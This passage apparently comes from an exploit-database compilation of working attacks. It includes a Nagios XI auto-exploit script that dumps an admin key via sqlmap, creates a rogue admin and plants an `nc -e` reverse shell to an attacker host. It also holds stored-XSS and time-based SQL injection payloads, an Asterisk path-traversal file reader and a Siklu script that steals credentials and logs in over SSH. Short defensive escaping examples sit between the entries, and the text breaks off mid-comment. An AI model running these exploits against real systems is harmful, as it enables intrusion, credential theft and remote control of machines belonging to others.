    match = re.search(r'auth_token": "(.*)"', r.text)
    if match:
        token = match.group(1)
        print(f'{Fore.MAGENTA}[+] Token: ' + token)
        r = requests.get(f'http://{IP}/nagiosxi/login.php?token={token}', verify=False)
        cookie = r.headers['Set-Cookie']
        cookie = cookie.split(',')[0]
        match = re.search(r'nagiosxi=(.*);', cookie)
        cookie = match.group(1)
        print(f"{Fore.MAGENTA}[+] Auth cookie is: " + cookie)
        return cookie
    else:
        print(f'{Fore.RED}[-] Authentication Failed..{Style.RESET_ALL}')
        exit()


def sqlmap(IP, username, password):
    print(f'{Fore.MAGENTA}[+] Starting SQLMAP...')
    session = requests.session()
    s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
    data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": username, "password": password, "loginButton": ''}
    s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
    print(f"{Fore.MAGENTA}[+] Authenticated as User..")
    print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
    s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
    session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
    print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
    newPass = "mawk"
    data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "nsp": nsp, "current_password": password, "password1": newPass, "password2": newPass, "reporttimesubmitbutton": ''}
    session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
    s = session.get(f'http://{IP}/nagiosxi/')
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    cookie = s.cookies.get('nagiosxi')
    sqlmap_command = f'sqlmap --flush-session -u "http://{IP}/nagiosxi//config/monitoringwizard.php/1*?update=1&nextstep=2&nsp={nsp}&wizard=mysqlserver" --cookie="nagiosxi={cookie}" --dump -D nagiosxi -T xi_users --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10 --batch'
    #print(sqlmap_command)
    sqlmap_command_output = subprocess.Popen(sqlmap_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    try:
        for line in iter(sqlmap_command_output.stdout.readline, ''):
            if "| Nagios Administrator |" in line:
                match = re.search(r"Nagios Administrator \| (.*?) \|", line)
                if match:
                    adminKey = match.group(1)
                    print(f"{Fore.MAGENTA}[+] Admin Key recovered: " + adminKey)
                    return adminKey
                else:
                    print(f"{Fore.RED}[-] Could not pull Admin Key :(....{Style.RESET_ALL}")
                    exit()
                break
        print("[-] SQLMAP capture FAILED..")
        sqlmap_command_output.terminate()
    except KeyboardInterrupt:
        print(f"{Fore.RED}[-] SQLMAP interrupted. Cleaning up...{Style.RESET_ALL}")
        sqlmap_command_output.terminate()
        sqlmap_command_output.communicate()
        exit()


def createAdmin(IP, adminKey):
    characters = string.ascii_letters + string.digits
    random_username = ''.join(random.choice(characters) for i in range(5))
    random_password = ''.join(random.choice(characters) for i in range(5))
    data = {"username": random_username, "password": random_password, "name": random_username, "email": f"{random_username}@mail.com", "auth_level": "admin"}
    r = requests.post(f'http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1', data=data, verify=False)
    if "success" in r.text:
        print(f'{Fore.MAGENTA}[+] Admin account created...')
        return random_username, random_password
    else:
        print(f'{Fore.RED}[-] Account Creation Failed!!! :(...{Style.RESET_ALL}')
        print(r.text)
        exit()


def start_HTTP_server():
    subprocess.Popen(["python", "-m", "http.server", "8000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)


def adminExploit(adminUsername, adminPassword, IP, LHOST, LPORT):
    print(f"{Fore.MAGENTA}[+] Conducting mandatory password change...")
    session = requests.session()
    s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
    data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": adminUsername, "password": adminPassword, "loginButton": ''}
    s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
    print(f"{Fore.MAGENTA}[+] Authenticated as admin..")
    print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
    s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
    match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
    nsp = match.group(1)
    data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
    session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
    print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
    newAdminPass = adminUsername + adminPassword
    data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "current_password": adminPassword, "nsp": nsp, "password1": newAdminPass, "password2": newAdminPass, "reporttimesubmitbutton": ''}
    session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
    print(f"{Fore.MAGENTA}[+] Creating new command...")
    data = {"tfName": adminUsername, "tfCommand": f"nc -e /usr/bin/sh {LHOST} {LPORT}", "selCommandType": "1", "chbActive": "1", "cmd": "submit", "mode": "insert", "hidId": "0", "hidName": '', "hidServiceDescription": '', "hostAddress": "127.0.0.1", "exactType": "command", "type": "command", "genericType": "command"}
    session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?type=command&page=1', data=data)
    data = {"cmd": '', "continue": ''}
    start_HTTP_server()
    print(f"{Fore.MAGENTA}[+] Created command: " + adminUsername)
    session.post(f'http://{IP}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm', data=data)
    data = {"search": adminUsername}
    s = session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?cmd=view&type=command&page=1', data=data)
    match = re.search(r"javascript:actionPic\('deactivate','(.*?)','", s.text)
    if match:
        commandCID = match.group(1)
        print(f"{Fore.MAGENTA}[+] Captured Command CID: " + commandCID)
        s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/?cmd=view&type=service")
        match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
        if match:
            nsp = match.group(1)
            s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test&cid={commandCID}&nsp={nsp}")
            os.system("kill -9 $(lsof -t -i:8000)")
            print(f"{Fore.RED}[+] CHECK UR LISTENER")
        else:
            print(f"{Fore.RED}[-] ERROR")
    else:
        print(f"{Fore.RED}[-] Failed to capture Command CID..{Style.RESET_ALL}")


if __name__ == '__main__':
    # The original block-letter banner (reading "MAWK SCRIPTS") did not survive extraction; kept as plain text here.
    ascii_art = f"""{Fore.LIGHTRED_EX}
    MAWK SCRIPTS
    {Style.RESET_ALL}
    """
    print(ascii_art)
    parser = argparse.ArgumentParser(description="AutoPwn Script for Bizness HTB machine", usage="sudo Nagios.py <Target IP> <LHOST> <LPORT>")
    parser.add_argument('IP', help="Target IP ")
    parser.add_argument('LHOST', help="Local host")
    parser.add_argument('LPORT', help="Listening Port")
    args = parser.parse_args()
    min_required_args = 3
    if len(vars(args)) != min_required_args:
        parser.print_usage()
        exit()
    adminUsername, adminPassword = createAdmin(args.IP, sqlmap(args.IP, input(f"{Fore.MAGENTA}[+] Please insert a non-administrative username: "), input(f"{Fore.MAGENTA}[+] Please insert the password: ")))
    print(f"{Fore.MAGENTA}[+] Admin Username=" + adminUsername)
    print(f"{Fore.MAGENTA}[+] Admin Password=" + adminPassword)
    adminExploit(adminUsername, adminPassword, args.IP, args.LHOST, args.LPORT)
-
LimeSurvey Community 5.3.32 - Stored XSS
# Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey Community Edition Version 5.3.32+220817
# Exploit Author: Subhankar Singh
# Date: 2024-02-03
# Vendor: LimeSurvey
# Software Link: https://community.limesurvey.org/releases/
# Version: LimeSurvey Community Edition Version 5.3.32+220817
# Tested on: Windows (Client)
# CVE: CVE-2024-24506

## Description:
A critical security vulnerability exists in LimeSurvey Community Edition Version 5.3.32+220817, particularly in the "General Setting" functionality's "Administrator email address:" field. This allows an attacker to compromise the super-admin account, leading to potential theft of cookies and session tokens.

## Background:
Cross-site scripting (XSS) is a common web security vulnerability that compromises user interactions with a vulnerable application. Stored XSS occurs when user input is stored in the application and executed whenever a user triggers or visits the page.

## Issue:
LimeSurvey fails to properly validate user-supplied input on both client and server sides, despite some protective measures. The "Administrator email address:" field within the "General Setting" functionality permits the insertion of special characters, enabling the injection of malicious JavaScript payloads. These payloads are stored in the database and executed when the user saves or reloads the page.

## Steps To Reproduce:
1. Log into the LimeSurvey application.
2. Navigate to the general settings.
3. Insert the following JavaScript payload in the "Administrator email address:" field:

Payload: `[email protected]"><u>s</u><svg onload=confirm(document.domain)>`

## Expected Result:
The LimeSurvey application should display an alert with the domain after clicking save and reloading the page.

## Actual Result:
The LimeSurvey application is vulnerable to Stored Cross-Site Scripting, as evidenced by the successful execution of the injected payload.

## Proof of Concept:
Attached Screenshots for the reference.
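The SPA-Cart, Insurance Management System and LimeSurvey entries above are three instances of one defect: a stored value is written back into HTML without output encoding, and in LimeSurvey's case a field that should only ever hold an e-mail address accepts quotes and angle brackets. The snippet below is an added example written for this page, not code from any of the three products; it shows the vulnerable concatenation beside the corrected rendering and a strict shape check for the e-mail field. The test strings are constructed from the payloads in the advisories, and every function name is this example's own.

```python
import html
import re

# Strict address shape for a field that must contain an e-mail address.
# Quotes, angle brackets and whitespace cannot pass it, so it rejects the LimeSurvey payload
# before anything is stored.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")


def validate_email(value):
    """Accept only a plain address; reject instead of trying to clean the input."""
    return bool(EMAIL_RE.fullmatch(value))


def render_product_row_unsafe(name, descr):
    """The vulnerable pattern: stored fields concatenated straight into markup."""
    return f"<tr><td>{name}</td><td>{descr}</td></tr>"


def render_product_row(name, descr):
    """Same row with HTML-body escaping applied at output time."""
    return f"<tr><td>{html.escape(name)}</td><td>{html.escape(descr)}</td></tr>"


def render_admin_email_input(value):
    """Attribute context: quote=True turns '\"' into &quot; so the value cannot close the attribute."""
    return f'<input type="email" name="admin_email" value="{html.escape(value, quote=True)}">'


# Tags used by the three advisories' payloads; <tr>/<td>/<input> are not in this list,
# so a match means stored input survived as live markup.
PAYLOAD_TAG_RE = re.compile(r"<(script|img|svg|u)\b", re.I)


def contains_live_markup(rendered):
    return bool(PAYLOAD_TAG_RE.search(rendered))


# Constructed test strings modelled on the page's payloads (the LimeSurvey one uses a
# placeholder address because the advisory's address was redacted).
SPA_CART_PAYLOAD = "<script>alert(1)</script>"
INSURANCE_PAYLOAD = '<img src=x onerror=prompt("xss")>'
LIMESURVEY_PAYLOAD = 'admin@example.com"><u>s</u><svg onload=confirm(document.domain)>'


def demo():
    """Return (unsafe_row_is_live, safe_row_is_live, email_accepted, input_is_live)."""
    return (
        contains_live_markup(render_product_row_unsafe("asdf", SPA_CART_PAYLOAD)),
        contains_live_markup(render_product_row(INSURANCE_PAYLOAD, SPA_CART_PAYLOAD)),
        validate_email(LIMESURVEY_PAYLOAD),
        contains_live_markup(render_admin_email_input(LIMESURVEY_PAYLOAD)),
    )


if __name__ == "__main__":
    print(demo())
    print(render_product_row(INSURANCE_PAYLOAD, SPA_CART_PAYLOAD))
    print(render_admin_email_input(LIMESURVEY_PAYLOAD))
```

The escaping is chosen per context: `html.escape` without `quote=True` is enough between tags, but inside an attribute the double quote must be encoded too, which is exactly the character the LimeSurvey payload relies on. Input validation and output encoding are complementary; the e-mail check stops the LimeSurvey case early, while free-text fields such as a product description or ticket subject can only be protected at render time.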
-
Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
# Date: 2023-03-26
# Exploit Author: Sean Pesce
# Vendor Homepage: https://asterisk.org/
# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
# Version: 18.20.0
# Tested on: Debian Linux
# CVE: CVE-2023-49294

#!/usr/bin/env python3
#
# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
# to the common INI configuration format.
#
# References:
#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294
#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

import argparse
import getpass
import socket
import sys

CVE_ID = 'CVE-2023-49294'
DEFAULT_PORT = 5038
DEFAULT_FILE = '/etc/hosts'
DEFAULT_ACTION_ID = 0
DEFAULT_TCP_READ_SZ = 1048576  # 1MB


def ami_msg(action, args, encoding='utf8'):
    """Serialise an AMI action: 'Key: Value' lines, CRLF-separated, terminated by a blank line."""
    assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}'
    assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}'
    if 'ActionID' not in args:
        args['ActionID'] = 0
    line_sep = '\r\n'
    data = f'Action: {action}{line_sep}'
    for a in args:
        data += f'{a}: {args[a]}{line_sep}'
    data += line_sep
    return data.encode(encoding)


def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):
    """Send data and read until the end of one AMI message (blank line)."""
    assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}'
    sock.sendall(data)
    resp = b''
    while not resp.endswith(b'\r\n\r\n'):
        resp += sock.recv(read_sz)
    return resp


if __name__ == '__main__':
    # Parse command-line arguments
    argparser = argparse.ArgumentParser()
    argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server')
    argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT)
    argparser.add_argument('-u', '--user', type=str, help='Asterisk AMI user', required=True)
    argparser.add_argument('-P', '--password', type=str, help='Asterisk AMI secret', default=None)
    argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE)
    argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID)

    if '-h' in sys.argv or '--help' in sys.argv:
        print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr)
        argparser.print_help()
        sys.exit(0)

    args = argparser.parse_args()

    # Validate command-line arguments
    assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
    args.host = socket.gethostbyname(args.host)
    if args.password is None:
        args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')

    print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
    print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr)

    # Connect to the Asterisk AMI server
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((args.host, args.port))

    # Read server banner
    banner = sock.recv(DEFAULT_TCP_READ_SZ)
    print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)

    # Authenticate to the Asterisk AMI server
    login_msg = ami_msg('Login', {'Username': args.user, 'Secret': args.password})
    login_resp = tcp_send_rcv(sock, login_msg)
    while b'Authentication' not in login_resp:
        login_resp = tcp_send_rcv(sock, b'')
    if b'Authentication accepted' not in login_resp:
        print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
        sys.exit(1)
    #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
    print('[INFO] Login success', file=sys.stderr)

    # Obtain file data via path traversal in the GetConfig Filename argument
    traversal = '../../../../../../../../'
    cfg_msg = ami_msg('GetConfig', {
        'ActionID': args.action_id,
        'Filename': f'{traversal}{args.file}',
        #'Category': 'default',
        #'Filter': 'name_regex=value_regex,',
    })
    resp = tcp_send_rcv(sock, cfg_msg)
    while b'Response' not in resp:
        resp = tcp_send_rcv(sock, b'')

    print('', file=sys.stderr)
    print(f'{resp.decode("utf8")}')

    if b'Error' in resp:
        sys.exit(1)

    pass  # Done
-
Workout Journal App 1.0 - Stored XSS
# Exploit Title: Workout Journal App 1.0 - Stored XSS
# Date: 12.01.2024
# Exploit Author: MURAT CAGRI ALIS
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows / MacOS / Linux
# CVE : CVE-2024-24050

# Description
Install and run the source code of the application on localhost. Register from the registration page at the URL workout-journal/index.php. When registering, stored XSS payloads can be entered in the First and Last name fields on the page. The registration form posts the first_name and last_name parameters to /workout-journal/endpoint/add-user.php. Enter " <script>console.log(document.cookie)</script> " for first_name and " <script>console.log(1337)</script> " for last_name. When you then log in you are redirected to /workout-journal/home.php. Open the browser console there and you can see that the stored XSS is working. You can also see from the page source that the payloads were stored and rendered unchanged. This vulnerability occurs because user-supplied data is stored without validation and rendered without output encoding, so the browser executes it.
# PoC

Register request to /workout-journal/endpoint/add-user.php:

POST /workout-journal/endpoint/add-user.php HTTP/1.1
Host: localhost
Content-Length: 268
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci
Connection: close

first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-

This request returns a 200 response:

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:05:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Content-Length: 214
Connection: close
Content-Type: text/html; charset=UTF-8

<script>
    alert('Account Registered Successfully!');
    window.location.href = 'http://localhost/workout-journal/';
</script>

After this, go to the login page and log in with the username and password. You can then see in the console that the payloads have executed.

/workout-journal/home.php request:

GET /workout-journal/home.php HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/endpoint/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1
Connection: close

/workout-journal/home.php response (the stored payloads appear unencoded inside the <h2> element):

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:07:56 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Workout Journal App</title>
    <!-- Style CSS -->
    <link rel="stylesheet" href="./assets/style.css">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
    <style>
        body { overflow: hidden; }
    </style>
</head>
<body>
    <div class="main">
        <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
            <a class="navbar-brand ml-3" href="#">Workout Journal App</a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarSupportedContent">
                <ul class="navbar-nav ml-auto">
                    <li class="nav-item active">
                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>
                    </li>
                </ul>
            </div>
        </nav>
        <div class="landing-page-container">
            <div class="heading-container">
                <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>
                <p>What would you like to do today?</p>
            </div>
            <div class="select-option">
                <div class="read-journal" onclick="redirectToReadJournal()">
                    <img src="./assets/read.jpg" alt="">
                    <p>Read your past workout journals.</p>
                </div>
                <div class="write-journal" onclick="redirectToWriteJournal()">
                    <img src="./assets/write.jpg" alt="">
                    <p>Write your todays journal.</p>
                </div>
            </div>
        </div>
    </div>
    <!-- Bootstrap JS -->
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js"></script>
    <!-- Script JS -->
    <script src="./assets/script.js"></script>
</body>
</html>
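Both of the stored XSS posts above (LimeSurvey's email field and the Workout Journal name fields) come down to the same two missing controls: the input is accepted as-is and the stored value is concatenated into HTML without output encoding. The following Python example is added here and is not code from either post or either project; it is a stand-in for the PHP sinks. It decodes the two injected fields from the Workout Journal PoC body exactly as shown, renders them the way home.php does and the way it should, applies the same encoding in the attribute context the LimeSurvey payload targets, and shows the strict validation an "administrator email" field should enforce. The address `a@b.com` in the LimeSurvey-style payload is a constructed stand-in, and `EMAIL_RE` is this example's own choice of what to accept.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed from the two injected fields of the PoC request body above,
# URL-encoded exactly as the page shows them (not the full form).
POC_BODY = ("first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29"
            "&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29")

# Attribute-context payload in the shape of the LimeSurvey one; "a@b.com" is a
# constructed stand-in for the address used in that post.
LIMESURVEY_STYLE_PAYLOAD = 'a@b.com"><u>s</u><svg onload=confirm(document.domain)>'

# Deliberately strict (this example's choice): one bare address, nothing else.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_welcome_vulnerable(first, last):
    """Mirrors the sink in home.php: stored names are concatenated into HTML as-is."""
    return f"<h2>Welcome {first} {last}</h2>"


def render_welcome_safe(first, last):
    """Same template with output encoding for an HTML text context."""
    return f"<h2>Welcome {html.escape(first)} {html.escape(last)}</h2>"


def render_email_attr_safe(email):
    """Attribute context: quote=True also encodes the double quote the payload
    relies on to break out of value="...". """
    return f'<input type="email" value="{html.escape(email, quote=True)}">'


def is_plausible_email(value):
    """Server-side validation: reject anything that is not a single bare address."""
    return EMAIL_RE.fullmatch(value) is not None


def contains_raw_script(rendered):
    """Crude marker used only to show the difference between the two renderings."""
    return "<script" in rendered.lower()


def demo():
    fields = decode_form(POC_BODY)
    return {
        "decoded": fields,
        "vulnerable": render_welcome_vulnerable(fields["first_name"], fields["last_name"]),
        "safe": render_welcome_safe(fields["first_name"], fields["last_name"]),
        "email_accepted": is_plausible_email(LIMESURVEY_STYLE_PAYLOAD),
        "email_attr": render_email_attr_safe(LIMESURVEY_STYLE_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Validation on the way in and encoding on the way out are independent controls: `is_plausible_email` stops the LimeSurvey-style value from ever being stored, while `html.escape` makes the Workout Journal value harmless even though it was stored. The escaping must match the context (text node versus attribute value); `quote=True` matters for the attribute case because the LimeSurvey payload begins with a closing quote.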
-
Purei CMS 1.0 - SQL Injection
# Exploit Title: Purei CMS 1.0 - SQL Injection
# Date: 27-03-2024
# Exploit Author: Number 7
# Vendor Homepage: purei.com
# Version: 1.0
# Tested on: Linux
____________________________________________________________________________________

Introduction:

An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection occurs when a web application inserts user input directly into an SQL statement without filtering out hazardous characters. This can compromise the integrity of the database or reveal sensitive information.
____________________________________________________________________________________

Time-Based Blind SQL Injection:

Vulnerable files:
  http://localhost/includes/getAllParks.php
  http://localhost/includes/getSearchMap.php

Make a POST request with the value of the "am" input set to:

  if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

Make sure to URL-encode the input. The payload is written so that it produces a 9-second delay whether the value lands in a numeric context, inside single quotes, or inside double quotes.

SQL Injection:

Method: POST request
Vulnerable file: /includes/events-ajax.php?action=getMonth
Data for the POST request:

  month=3&type=&year=2024&cal_id=1[Inject Here]
-
Broken Access Control - on NodeBB v3.6.7
Exploit Title: Broken Access Control - on NodeBB v3.6.7
Date: 22/2/2024
Exploit Author: Vibhor Sharma
Vendor Homepage: https://nodebb.org/
Version: 3.6.7

Description:
I identified a broken access control vulnerability in NodeBB v3.6.7, enabling attackers to access restricted information intended solely for administrators. Specifically, this data is accessible only to admins and not to regular users. Through testing, I discovered that when a user accesses the group section of the application and intercepts the response for the corresponding request, certain attributes are provided in the JSON response. By manipulating these attributes, a user can gain access to tabs restricted to administrators. Upon reporting this issue, it was duly acknowledged and promptly resolved by the developers.

Steps To Reproduce:
1) A user with the least privileges needs to navigate to the group section.
2) Intercept the response for the group request.
3) In the response, modify the following parameters:
   "system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true,
4) Forward the request; the attacker can now access the restricted information.

Impact:
The attacker was able to access the restricted tabs of the Admin group, which are only allowed to administrators.
-
Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure
# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detection by pinging the all-hosts multicast address on the interface attached to the device
#    `ping6 -I en7 -c 2 ff02::1`
# 2. Review the IPv6 neighbours and identify the target device by the vendor part of its MAC address
#    `ip -6 neigh show dev en7`
# 3. Execute the script
#    `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access

import socket
import sys
import os

address = str(sys.argv[1])  # the target
port = 12777

# Captured command; sends "GetCredentials" to obtain the randomly generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]

s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.send(cmd)
data = s.recv(200)
s.close()

output = "".join(map(chr, data))

# Split the output on '#', then drop the trailing noise: each field is always 35 characters long
splits = output.split('#')
username = splits[1][slice(0, 35, 1)]
password = splits[2][slice(0, 35, 1)]

print('Username: ', username)
print('Password: ', password)

os.system("sshpass -p {password} ssh -o StrictHostKeyChecking=no {address} -l {username}".format(address=address, username=username, password=password))
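The script above replays one captured frame and slices the reply by `#`. The Python example below is added here and is not the author's code or anything from Siklu; it reconstructs the request framing from that single capture so the command can be built rather than replayed, and parses the reply defensively. The layout (a 4-byte big-endian length of everything that follows, 20 header bytes kept verbatim from the capture, a 2-byte big-endian length of the command name, the ASCII name, then 5 zero bytes) is inferred from the hex on the page and is an assumption, not vendor documentation; `SAMPLE_RESPONSE` is constructed for the example because the page does not show the device's reply bytes.

```python
import struct

# The captured request from the script above (hex as given on the page).
CAPTURED = bytes.fromhex(
    "000000290FFF000100000001000100000000800100010000000E"
    "47657443726564656E7469616C730000000000")

# Layout inferred from that single capture (assumption, not documentation):
#   u32 BE  length of everything after this field
#   20 B    opaque header, copied verbatim from the capture
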